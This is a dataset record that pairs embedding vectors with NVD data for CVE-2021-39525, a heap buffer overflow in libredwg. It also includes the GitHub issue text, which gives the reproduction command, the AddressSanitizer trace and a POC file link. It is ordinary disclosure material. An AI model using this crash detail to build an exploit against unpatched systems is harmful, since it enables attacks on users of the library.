0.01860187202692032, -0.0028513551224023104, 0.017159638926386833, -0.010846186429262161, -0.0001577443181304261, -0.010492986999452114, -0.000487949640955776, 0.009448102675378323, 0.015584954991936684, 0.00813096109777689, 0.02899184264242649, -0.0038005802780389786, 0.0032726197969168425, 0.012016162276268005, -0.0041390638798475266, -0.0197644904255867, -0.01718907244503498, 0.0019242047565057874, -0.017365671694278717, 0.000990615924820304, -0.016026455909013748, -0.0014946619048714638, -0.017512839287519455, -0.0033719572238624096, -0.021133139729499817, 0.001229761866852641, 0.011375986970961094, 0.011942578479647636, 0.006769668776541948, 0.029359759762883186, 0.038616545498371124, 0.0015369723550975323, -0.0014367150142788887, -0.016556255519390106, 0.018469423055648804, -0.00828548613935709, 0.0005941856070421636, -0.023899873718619347, 0.004407642874866724, 0.0032192717771977186, 0.0034363428130745888, -0.0020419382490217686, -0.0027667342219501734, 0.007939644157886505, 0.004628393333405256, 0.004437076393514872, 0.011368628591299057, 0.0005997043335810304, 0.012928595766425133, 0.005044138990342617, 0.012442945502698421, 0.0069757020100951195, -0.004904330708086491, -0.0019775526598095894, -0.0038852011784911156, 0.011846920475363731, 0.020235422998666763, -0.013186137191951275, 0.033347975462675095, 0.030434075742959976, 0.0018423432484269142, 0.007281072903424501, -0.00010439638572279364, -0.013289154507219791, -0.002647161250934005, 0.008403219282627106, 0.007888135500252247, 0.0041905720718204975, 0.01592343859374523, -0.0012573555577546358, -0.01295802928507328, 0.0037932221312075853, 0.01045619510114193, 0.003620301140472293, 0.012487095780670643, 0.013590846210718155, -0.006070626899600029, 0.003818976227194071, -0.01167032029479742, 0.0194848719984293, 0.007457673083990812, -0.009808661416172981, 0.0023767424281686544, -0.01063279528170824, 0.015047796070575714, 0.040735747665166855, 0.0009823378641158342, 0.007402485702186823, -0.0062766601331532, 0.010066202841699123, -0.022442923858761787, -0.02425307407975197, 0.022693106904625893, -0.01453271321952343, -0.002133917296305299, 0.0025993320159614086, -0.018734322860836983, -0.012810862623155117, -0.012884445488452911, 0.0013658910756930709, -0.00309969880618155, 0.01001469511538744, 0.00712286913767457, -0.030669543892145157, 0.008675477467477322, 0.006552597973495722, -0.021633507683873177, 0.01428252924233675, 0.012855011969804764, 0.007579085882753134, -0.004970555659383535, -0.0033425239380449057, -0.007520218845456839, 0.0003978100139647722, 0.010831469669938087, -0.006699764635413885, 0.007457673083990812, -0.009904319420456886, -0.008852077648043633, -0.01733623817563057, -0.028918258845806122, -0.013576129451394081, 0.004981593228876591, 0.00803530216217041, 0.008646043948829174, -0.03013974241912365, 0.005375264212489128, 0.0006217793561518192, 0.0009078346774913371, 0.0083075612783432, -0.010941845364868641, -0.007281072903424501, -0.0034547385293990374, -0.0351434126496315, 0.013524620793759823, -0.0014128003967925906, 0.007829269394278526, -0.00371963856741786, 0.008425294421613216, 0.007086077239364386, 0.01242087036371231, -0.010993353091180325, 0.002144954865798354, 0.005419414024800062, -0.01807207241654396, 0.010058844462037086, 0.00797643605619669, 0.004072838928550482, 0.028535624966025352, 0.018984505906701088, 0.01607060432434082, -0.015003646723926067, -0.006648256443440914, -0.001247237902134657, 0.019013939425349236, 0.00007979194924701005, -0.013929329812526703, -0.02033844031393528, 0.004532734863460064, 0.003991897217929363, -0.002924938453361392, -0.004926405847072601, 0.003818976227194071, -0.018660739064216614, 0.01688002236187458, -0.004194251261651516, 0.007005135528743267, 0.017100771889090538, 0.009396594949066639, 0.011420137248933315, 0.003581669880077243, -0.012376721017062664, 0.01453271321952343, -0.004981593228876591, 0.01676228828728199, -0.01714492216706276, -0.009433385916054249, -0.027858659625053406, 0.008491518907248974, 0.007395127322524786, 0.007785119116306305, -0.01995580643415451, 0.01611475460231304, -0.004381889011710882, -0.0276379082351923, -0.000903235690202564, 0.006272980943322182, 0.005180268082767725, 0.025960208848118782, -0.009175844490528107, 0.0207210723310709, 0.023311207070946693, 0.007932285778224468, 0.01587928831577301, -0.031581975519657135, 0.007240602280944586, -0.027858659625053406, 0.0017236900748685002, 0.016217771917581558, -0.009529044851660728, -0.01014714501798153, 0.006004401948302984, -0.036232445389032364, -0.011537870392203331, 0.0038631262723356485, 0.03443701192736626, 0.015349487774074078, 0.004459151532500982, 0.0024632029235363007, 0.002181746531277895, -0.009874886833131313, 0.010721094906330109, 0.007534935604780912, 0.006832214538007975, 0.005077251698821783, 0.00560337258502841, 0.006210435181856155, -0.007534935604780912, -0.01587928831577301, 0.052155882120132446, 0.0034657760988920927, 0.02753489278256893, -0.0031659239903092384, -0.015423071570694447, 0.0009979743044823408, -0.01530533842742443, 0.0009795784717425704, -0.006317131221294403, 0.026092657819390297, 0.011736545711755753, 0.005824122577905655, 0.0039219930768013, -0.004654147196561098, -0.002978286240249872, -0.006309772841632366, -0.003384834388270974, -0.010316386818885803, -0.01045619510114193, -0.019749773666262627, -0.020676923915743828, 0.00003687790740514174, 0.0420602448284626, -0.01428252924233675, 0.00955111999064684, -0.007866060361266136, -0.008211902342736721, -0.00616996455937624, 0.00828548613935709, -0.007005135528743267, 0.03222950920462608, -0.02222217433154583, 0.006368639413267374, 0.0009404872544109821, 0.0007648069877177477, -0.014061779715120792, 0.021088989451527596, 0.018484139814972878, 0.00465046800673008, -0.019367139786481857, 0.008520952425897121, 0.012582753784954548, -0.0059823268093168736, 0.010625436902046204, 0.007932285778224468, -0.004481226205825806, -0.014032346196472645, 0.009874886833131313, 0.008550385944545269, 0.022281039506196976, 0.01991165615618229, -0.0037159596104174852, 0.0058130850084125996, 0.001515817129984498, -0.00017889952869154513, -0.009492252953350544, -0.0023105174768716097, 0.003888880368322134, -0.005033101420849562, -0.02014712244272232, -0.009219994768500328, -0.017866039648652077, -0.0021394360810518265, -0.0014339556219056249, -0.032317809760570526, 0.0025239090900868177, -0.01220747921615839, 0.026239825412631035, -0.0013456556480377913, 0.02668132446706295, 0.0024448069743812084, 0.00021212702267803252, -0.006905797868967056, -0.008153036236763, -0.0011773337610065937, 0.0040544429793953896, 0.004253117833286524, -0.013384812511503696, 0.0009087544749490917, -0.009543761610984802, -0.0003400930727366358, -0.01122882030904293, -0.004970555659383535, -0.007660027593374252, 0.008233977481722832, -0.00378218456171453, -0.00955111999064684, -0.009021319448947906, -0.014334037899971008, 0.029977859929203987, 0.015069871209561825, -0.004694618284702301, -0.01718907244503498, -0.005952893756330013, 0.014540071599185467, 0.00018073912360705435, -0.018086789175868034, -0.010735811665654182, -0.0032155925873667, 0.012509170919656754, 0.0056512015871703625, 0.003246865700930357, -0.008888869546353817, -0.004124347120523453, 0.005529789254069328, -0.007148623000830412, 0.008734344504773617, -0.011434854008257389, 0.0016381494933739305, 0.004002934787422419, 0.005298001691699028, -0.00888151116669178, -0.019617322832345963, 0.0024999945890158415, 0.020927106961607933, 0.021442189812660217, 0.007924927398562431, -0.0013327786000445485, 0.006033835466951132, -0.00006812209176132455, -0.009175844490528107, -0.007494464982300997, 0.020353157073259354, 0.0033498823177069426, 0.008896227926015854, 0.005673276726156473, 0.014238379895687103, 0.01699775457382202, -0.009072828106582165, 0.007954360917210579, -0.0008117164252325892, -0.011059578508138657, 0.020426739007234573, 0.010640153661370277, -0.0005573939415626228, 0.021353889256715775, -0.016217771917581558, 0.00874906126409769, 0.024208923801779747, -0.004536414053291082, -0.0020309006795287132, 0.04647524654865265, -0.0021394360810518265, 0.013127271085977554, -0.009757152758538723, -0.010139786638319492, 0.009411311708390713, 0.00375826982781291, -0.004944801330566406, -0.023237623274326324, 0.030963877215981483, 0.009021319448947906, -0.0031567260157316923, 0.005452526733279228, 0.0076453108340501785, 0.01249445416033268, 0.010183936916291714, 0.0022608486469835043, -0.03228837624192238, -0.004617355763912201, -0.005213380791246891, 0.018322255462408066, -0.0017246098723262548, -0.0006089022499509156, 0.020824089646339417, 0.008991885930299759, -0.004554810002446175, -0.013693862594664097, 0.016158904880285263, 0.002838477957993746, -0.02741715870797634, -0.014701955020427704, -0.004639430437237024, -0.010809395462274551, 0.006552597973495722, 0.015908721834421158, 0.01991165615618229, 0.010816753841936588, 0.010941845364868641, 0.0036092635709792376, 0.014760821126401424, 0.00989696104079485, -0.0024852778296917677, 0.02503305859863758, 0.04479754716157913, -0.01412800420075655, -0.02660774253308773, -0.00043184231617487967, 0.017983771860599518, -0.0032560634426772594, -0.0031272927299141884, -0.013590846210718155, 0.00756436912342906, -0.0043598138727247715, -0.0012794305803254247, 0.019676189869642258, 0.018896205350756645, -0.02210444025695324, 0.03090501017868519, 0.0004030988202430308, -0.00125183688942343, -0.011662961915135384, -0.012097103521227837, 0.005264888983219862 ]
2,070
CVE-2021-39525
2021-09-20T16:15:11.990000
An issue was discovered in libredwg through v0.10.1.3751. bit_read_fixed() in bits.c has a heap-based buffer overflow.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/261" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:*:*:*:*:*:*:*:*", "matchCriteriaId": "937A8147-F4AB-4717-9E3F-4CFDF8194421", "versionEndExcluding": null, "versionEndIncluding": "0.10.1.3751", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/LibreDWG/libredwg/issues/261
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
## System info Ubuntu X64, gcc (Ubuntu 5.5.0-12ubuntu1), dwg2dxf (latest master [39ef943](https://github.com/LibreDWG/libredwg/commit/39ef9439f35111170258cf57cc0c58eabc4748c7)) ## Configure CFLAGS="-g -fsanitize=address" LDFLAGS="-fsanitize=address" ./configure ## Command line ./programs/dwg2dxf -b -m ./SEGV-check_POLYLINE_handles-decode-5110 -o /dev/null ## AddressSanitizer output ``` ================================================================= ==65289==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62c0000381ff at pc 0x7fc1be68a945 bp 0x7fff3419f990 sp 0x7fff3419f138 READ of size 6 at 0x62c0000381ff thread T0 #0 0x7fc1be68a944 in __asan_memcpy (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x8c944) #1 0x5588916f116f in memcpy /usr/include/x86_64-linux-gnu/bits/string_fortified.h:34 #2 0x5588916f116f in bit_read_fixed /home/seviezhou/libredwg/src/bits.c:1424 #3 0x558891715678 in acds_private /home/seviezhou/libredwg/src/acds.spec:111 #4 0x5588917b3161 in read_2004_section_acds /home/seviezhou/libredwg/src/decode.c:3437 #5 0x5588917b3161 in decode_R2004 /home/seviezhou/libredwg/src/decode.c:3694 #6 0x5588917bf646 in dwg_decode /home/seviezhou/libredwg/src/decode.c:242 #7 0x5588916b89fc in dwg_read_file /home/seviezhou/libredwg/src/dwg.c:251 #8 0x5588916b5e12 in main /home/seviezhou/libredwg/programs/dwg2dxf.c:258 #9 0x7fc1bde90b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #10 0x5588916b6d69 in _start (/home/seviezhou/libredwg/programs/dwg2dxf+0xa88d69) 0x62c0000381ff is located 1 bytes to the left of 29696-byte region [0x62c000038200,0x62c00003f600) allocated by thread T0 here: #0 0x7fc1be6967aa in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x987aa) #1 0x5588917211c4 in read_2004_compressed_section /home/seviezhou/libredwg/src/decode.c:2432 #2 0x5588922c13aa (/home/seviezhou/libredwg/programs/dwg2dxf+0x16933aa) SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 __asan_memcpy Shadow bytes around the buggy address: 0x0c587fffefe0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c587fffeff0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c587ffff000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c587ffff010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c587ffff020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c587ffff030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa] 0x0c587ffff040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c587ffff050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c587ffff060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c587ffff070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c587ffff080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==65289==ABORTING ``` ## POC [heap-overflow-bit_read_fixed-bits-1424.zip](https://github.com/LibreDWG/libredwg/files/5011661/heap-overflow-bit_read_fixed-bits-1424.zip)
A heap overflow in bits.c:1424
https://api.github.com/repos/LibreDWG/libredwg/issues/261/comments
1
2020-08-02T04:51:37
2020-08-02T12:15:30Z
https://github.com/LibreDWG/libredwg/issues/261
671,508,299
261
true
This is a GitHub Issue repo:libredwg owner:LibreDWG Title : A heap overflow in bits.c:1424 Issue date: --- start body --- ## System info Ubuntu X64, gcc (Ubuntu 5.5.0-12ubuntu1), dwg2dxf (latest master [39ef943](https://github.com/LibreDWG/libredwg/commit/39ef9439f35111170258cf57cc0c58eabc4748c7)) ## Configure CFLAGS="-g -fsanitize=address" LDFLAGS="-fsanitize=address" ./configure ## Command line ./programs/dwg2dxf -b -m ./SEGV-check_POLYLINE_handles-decode-5110 -o /dev/null ## AddressSanitizer output ``` ================================================================= ==65289==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62c0000381ff at pc 0x7fc1be68a945 bp 0x7fff3419f990 sp 0x7fff3419f138 READ of size 6 at 0x62c0000381ff thread T0 #0 0x7fc1be68a944 in __asan_memcpy (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x8c944) #1 0x5588916f116f in memcpy /usr/include/x86_64-linux-gnu/bits/string_fortified.h:34 #2 0x5588916f116f in bit_read_fixed /home/seviezhou/libredwg/src/bits.c:1424 #3 0x558891715678 in acds_private /home/seviezhou/libredwg/src/acds.spec:111 #4 0x5588917b3161 in read_2004_section_acds /home/seviezhou/libredwg/src/decode.c:3437 #5 0x5588917b3161 in decode_R2004 /home/seviezhou/libredwg/src/decode.c:3694 #6 0x5588917bf646 in dwg_decode /home/seviezhou/libredwg/src/decode.c:242 #7 0x5588916b89fc in dwg_read_file /home/seviezhou/libredwg/src/dwg.c:251 #8 0x5588916b5e12 in main /home/seviezhou/libredwg/programs/dwg2dxf.c:258 #9 0x7fc1bde90b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #10 0x5588916b6d69 in _start (/home/seviezhou/libredwg/programs/dwg2dxf+0xa88d69) 0x62c0000381ff is located 1 bytes to the left of 29696-byte region [0x62c000038200,0x62c00003f600) allocated by thread T0 here: #0 0x7fc1be6967aa in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x987aa) #1 0x5588917211c4 in read_2004_compressed_section /home/seviezhou/libredwg/src/decode.c:2432 #2 0x5588922c13aa (/home/seviezhou/libredwg/programs/dwg2dxf+0x16933aa) SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 __asan_memcpy Shadow bytes around the buggy address: 0x0c587fffefe0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c587fffeff0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c587ffff000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c587ffff010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c587ffff020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c587ffff030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa] 0x0c587ffff040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c587ffff050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c587ffff060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c587ffff070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c587ffff080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==65289==ABORTING ``` ## POC [heap-overflow-bit_read_fixed-bits-1424.zip](https://github.com/LibreDWG/libredwg/files/5011661/heap-overflow-bit_read_fixed-bits-1424.zip) --- end body ---
3,800
[ -0.028952211141586304, 0.0179443396627903, -0.0033966070041060448, -0.0007030712440609932, 0.05911076441407204, 0.04523782804608345, -0.004161880351603031, 0.041226740926504135, -0.008821376599371433, 0.022317329421639442, -0.0260117519646883, -0.00037297647213563323, 0.010683666914701462, -0.0024711163714528084, 0.02242288365960121, 0.017899101600050926, -0.018472112715244293, 0.020673688501119614, -0.012530878186225891, -0.004357910715043545, 0.03513471409678459, -0.02073400467634201, -0.012078500352799892, 0.034229956567287445, -0.018381638452410698, 0.013812617398798466, 0.004165649879723787, 0.013556268997490406, -0.008467013947665691, 0.017627673223614693, -0.003607716877013445, 0.03492360562086105, -0.004814059007912874, 0.0019244926515966654, 0.03606962785124779, 0.0064727794378995895, 0.04315688833594322, 0.07201862335205078, -0.008504712022840977, 0.016511807218194008, -0.005730125121772289, -0.06351391226053238, -0.014732453040778637, 0.028665704652667046, 0.008489632979035378, 0.010578112676739693, 0.02011575549840927, 0.008851535618305206, -0.04385053738951683, -0.009605498984456062, 0.01357134897261858, -0.006672579795122147, -0.032510921359062195, -0.048223525285720825, 0.008926931768655777, 0.001984809758141637, 0.009786450304090977, 0.042433083057403564, -0.012689211405813694, -0.010057877749204636, -0.02724825218319893, 0.015908636152744293, 0.015064196661114693, 0.02919347956776619, -0.02673555724322796, -0.00612595584243536, -0.013382857665419579, 0.033355358988046646, -0.03187758848071098, 0.005145803093910217, -0.018517350777983665, -0.01857766881585121, 0.01948242448270321, 0.031666480004787445, 0.029253795742988586, 0.0013326311018317938, 0.02396097034215927, -0.01717529632151127, -0.019844327121973038, 0.014822928234934807, -0.04110610857605934, 0.03992992267012596, -0.020160991698503494, 0.026102228090167046, 0.0298871248960495, 0.004557711072266102, -0.024594299495220184, -0.0801614299416542, -0.019618138670921326, -0.044815611094236374, -0.003234504722058773, 0.0226339939981699, 0.03083712048828602, -0.0018029159400612116, 0.010442398488521576, -0.003950770478695631, -0.026765715330839157, -0.021126065403223038, -0.041196584701538086, -0.014483644627034664, -0.033898212015628815, 0.008836455643177032, -0.02970617450773716, 0.019949883222579956, 0.021880030632019043, 0.0008326587849296629, -0.0006649018614552915, -0.012402704916894436, 0.03314425051212311, 0.10012639313936234, 0.01430269330739975, -0.011550725437700748, -0.005281516350805759, 0.032329969108104706, -0.01225191168487072, 0.013390397652983665, 0.036461688578128815, -0.006936467252671719, -0.04659496247768402, -0.012312228791415691, -0.01150548830628395, -0.05326000228524208, -0.032541077584028244, 0.0075660268776118755, -0.00025941067724488676, 0.020417340099811554, 0.0010131389135494828, -0.027866503223776817, -0.03284266218543053, -0.02637365460395813, -0.027821265161037445, -0.0410156324505806, 0.005941234994679689, -0.009944782592356205, -0.00137127167545259, 0.003886683378368616, -0.01067612785845995, 0.048404477536678314, 0.023764939978718758, 0.0012628893600776792, -0.06815832853317261, -0.023825256153941154, 0.01596895419061184, -0.0015738994115963578, -0.014755072072148323, 0.011430091224610806, -0.015041578561067581, 0.016361014917492867, -0.005673577543348074, 0.009092804044485092, -0.01645149104297161, 0.009952322579920292, 0.01912052184343338, 0.017311008647084236, 0.04098547250032425, -0.012809845618903637, 0.03938706964254379, 0.025061756372451782, 0.003969619516283274, -0.03136489540338516, 0.0020960194524377584, -0.026569684967398643, -0.0003619026392698288, -0.0358283594250679, -0.045479096472263336, 0.003954540006816387, 0.035225190222263336, 0.02619270235300064, 0.0021601063199341297, 0.022649073973298073, -0.004546402022242546, -0.0038904533721506596, 0.025800641626119614, 0.029660936444997787, -0.06876149773597717, 0.016647521406412125, -0.02150304801762104, 0.010517795570194721, -0.028484752401709557, -0.011415012180805206, -0.006239050533622503, -0.0015767267905175686, -0.005948774516582489, 0.03142521157860756, 0.02509191632270813, -0.0006022286252118647, 0.03058077208697796, -0.0332648828625679, -0.007313448935747147, 0.0017595631070435047, -0.004553941544145346, -0.018125290051102638, 0.01463443785905838, -0.015531654469668865, 0.02114114537835121, -0.02568000741302967, -0.03854263201355934, -0.023749860003590584, 0.010578112676739693, 0.005684887059032917, -0.009386849589645863, 0.033717263489961624, -0.044121962040662766, 0.01780862547457218, -0.029133161529898643, 0.020930035039782524, -0.021231621503829956, 0.03290298208594322, 0.01477769110351801, -0.019618138670921326, -0.001130945747718215, -0.01373722031712532, 0.02186495065689087, 0.00526643730700016, -0.02890697307884693, 0.024714933708310127, 0.017793545499444008, -0.00826344359666109, -0.023780018091201782, -0.00784122385084629, 0.016255460679531097, -0.01768799126148224, -0.00321942544542253, -0.0016851091058924794, -0.05886949598789215, -0.0013401707401499152, -0.0005621742457151413, 0.013232065364718437, -0.023026054725050926, 0.0012006873730570078, 0.04900764673948288, -0.015652289614081383, 0.014596739783883095, 0.021442731842398643, 0.011038030497729778, -0.022754628211259842, 0.0010951324366033077, 0.004271205049008131, -0.009130502119660378, -0.0006931754760444164, -0.0034135712776333094, 0.03106330893933773, -0.0029498834628611803, -0.0401410348713398, 0.006163654383271933, 0.027972057461738586, -0.014317773282527924, 0.00420334842056036, 0.0013288612244650722, 0.02319192700088024, 0.0007026000530458987, 0.00848209299147129, 0.032209333032369614, -0.0020394721068441868, 0.0063295261934399605, -0.0035587092861533165, 0.00912296213209629, 0.036612484604120255, -0.0251974705606699, -0.020417340099811554, 0.04400132969021797, 0.014468565583229065, -0.02465461753308773, 0.0221665371209383, 0.00410156324505806, -0.004949772264808416, -0.008889233693480492, 0.005549173802137375, -0.004384299740195274, -0.0537726990878582, 0.02424747683107853, -0.02065860852599144, -0.006420001853257418, -0.048736222088336945, -0.011452710255980492, 0.014958642423152924, -0.001984809758141637, 0.006499167997390032, 0.004489854443818331, -0.010397161357104778, 0.0026501829270273447, 0.016783233731985092, -0.024549061432480812, 0.010299146175384521, -0.012101119384169579, -0.026388732716441154, 0.013639205135405064, -0.009107883088290691, -0.028333960101008415, -0.006691428832709789, -0.0009009867790155113, -0.017235612496733665, -0.04261403530836105, 0.003901762655004859, 0.006310677155852318, 0.031998224556446075, 0.003686883021146059, -0.0290426854044199, -0.008723361417651176, -0.018668144941329956, -0.017853863537311554, -0.023523671552538872, -0.009040025994181633, 0.00020557294192258269, -0.02457921952009201, -0.005010089371353388, -0.030203791335225105, 0.013548729941248894, -0.0009839227423071861, -0.00396584952250123, 0.05425523594021797, -0.050967954099178314, -0.008949550800025463, -0.003675573505461216, -0.0029819270130246878, -0.031214101240038872, -0.001703958259895444, -0.018984809517860413, 0.0021054439712315798, 0.007886461913585663, -0.050787001848220825, -0.003980929031968117, -0.03631089627742767, 0.015343164093792439, 0.02783634327352047, -0.0021110987290740013, -0.018396716564893723, 0.027006983757019043, -0.05874885991215706, 0.026901429519057274, -0.0042108879424631596, -0.02831888012588024, -0.03088235855102539, -0.04125690087676048, -0.01514713279902935, -0.03570772707462311, -0.024624457582831383, 0.010155892930924892, -0.00890431273728609, -0.010804301127791405, -0.01912052184343338, 0.03528550639748573, -0.004259895533323288, -0.0016002882039174438, 0.014815389178693295, 0.008881693705916405, 0.005085485987365246, 0.006378533784300089, 0.010419780388474464, -0.005903536919504404, 0.001011253916658461, 0.06037742272019386, 0.0226339939981699, 0.03549661487340927, -0.002369331195950508, -0.02468477562069893, -0.021548286080360413, -0.019648296758532524, 0.01581816002726555, -0.033204566687345505, 0.011776914820075035, -0.0037151568103581667, 0.011415012180805206, -0.0005584044265560806, 0.023825256153941154, 0.015848319977521896, 0.010057877749204636, -0.029495064169168472, -0.030460137873888016, 0.006288058124482632, -0.03649184852838516, 0.06441866606473923, -0.008851535618305206, -0.013857854530215263, -0.02747444063425064, -0.0332648828625679, 0.02037210203707218, 0.016240380704402924, -0.02809269167482853, 0.011980485171079636, -0.008874153718352318, 0.02114114537835121, 0.01952766254544258, -0.05362190678715706, 0.016270538792014122, -0.014755072072148323, -0.012862622737884521, 0.03775850683450699, -0.012832463718950748, -0.00818804744631052, -0.025257788598537445, 0.038482312113046646, -0.0002886267611756921, -0.058447275310754776, 0.013903092592954636, 0.0316363200545311, 0.024262554943561554, -0.005307905375957489, 0.04647433012723923, -0.039537861943244934, 0.004878146108239889, -0.008685663342475891, 0.007094799540936947, -0.008172967471182346, 0.0019395719282329082, 0.03080696240067482, 0.003996008075773716, -0.026237940415740013, 0.036944225430488586, -0.00011827807611552998, 0.015358243137598038, 0.01498126145452261, -0.024413349106907845, 0.005081715993583202, 0.015328084118664265, 0.030535534024238586, -0.010344383306801319, -0.010306685231626034, -0.047348927706480026, 0.036612484604120255, -0.0268561914563179, 0.008730901405215263, 0.016255460679531097, 0.013684443198144436, 0.002103558974340558, 0.006947776768356562, -0.0032288499642163515, 0.027187936007976532, 0.03606962785124779, -0.011113426648080349, -0.015878478065133095, 0.036612484604120255, 0.0060204011388123035, 0.03908548504114151, -0.024971282109618187, -0.028122849762439728, -0.023764939978718758, -0.05069652572274208, -0.019391950219869614, -0.0056999665684998035, 0.0006625457317568362, 0.0323902852833271, -0.03546645864844322, -0.06514247506856918, 0.007954318076372147, -0.04062357172369957, -0.04843463748693466, -0.010864618234336376, 0.0179443396627903, -0.014498724602162838, -0.038663264364004135, 0.025227628648281097, -0.02109590731561184, -0.015576892532408237, 0.017567357048392296, -0.022437963634729385, -0.02575540356338024, -0.016828471794724464, 0.04297593608498573, -0.006812063045799732, 0.00700432388111949, 0.007437853142619133, -0.019331632182002068, -0.02062845043838024, 0.043639425188302994, 0.05630601942539215, 0.04611242562532425, -0.02798713743686676, 0.004444616846740246, -0.002250581979751587, -0.023945890367031097, 0.012591195292770863, 0.0016059429617598653, -0.01087969820946455, -0.009990020655095577, 0.030052997171878815, -0.019256236031651497, -0.011671359650790691, -0.013805077411234379, -0.04372990131378174, 0.0028028604574501514, -0.033385518938302994, -0.01666259951889515, -0.009899544529616833, 0.023252245038747787, 0.0018311896128579974, 0.01601419225335121, 0.0035191262140870094, -0.01934671215713024, 0.02699190378189087, 0.023357799276709557, 0.016270538792014122, -0.0038716041017323732, -0.03471249341964722, -0.003006430808454752, 0.026645081117749214, -0.013759839348495007, 0.033717263489961624, 0.05618538334965706, 0.04261403530836105, 0.015727685764431953, -0.023976050317287445, 0.03480296954512596, -0.019407028332352638, 0.012960637919604778, -0.039266437292099, -0.027052221819758415, 0.05268699303269386, -0.0014315887819975615, -0.03193790838122368, 0.02245304174721241, -0.03021886944770813, 0.0017887791618704796, -0.02699190378189087, -0.006220201496034861, -0.017823705449700356, 0.022799866273999214, -0.02212129905819893, 0.011294377967715263, 0.010781683027744293, -0.00009029894863488153, -0.019316552206873894, -0.00042174849659204483, 0.038150567561388016, 0.03088235855102539, 0.016722917556762695, 0.027610154822468758, -0.027414124459028244, 0.006815833039581776, -0.001730346935801208, 0.00006550060788867995, -0.0043428316712379456, -0.018306242302060127, 0.032691869884729385, -0.002399489749222994, 0.01095509435981512, 0.005289056338369846, -0.005752744153141975, 0.015878478065133095, 0.02076416276395321, 0.00396584952250123, 0.037125177681446075, -0.04677591472864151, 0.020884796977043152, -0.03260139375925064, 0.02076416276395321, 0.00008122782310238108, 0.048555269837379456, 0.012289609760046005, -0.01259873528033495, -0.002278855536133051, -0.019904645159840584, 0.009085264056921005, 0.0022260781843215227, -0.0027331188321113586, 0.025800641626119614, -0.0005734837031923234, -0.008640425279736519, 0.013556268997490406, 0.007068410981446505, -0.0001289984938921407, -0.020779242739081383, 0.0056132604368031025, -0.010178511962294579, 0.005262667313218117, -0.009401928633451462, 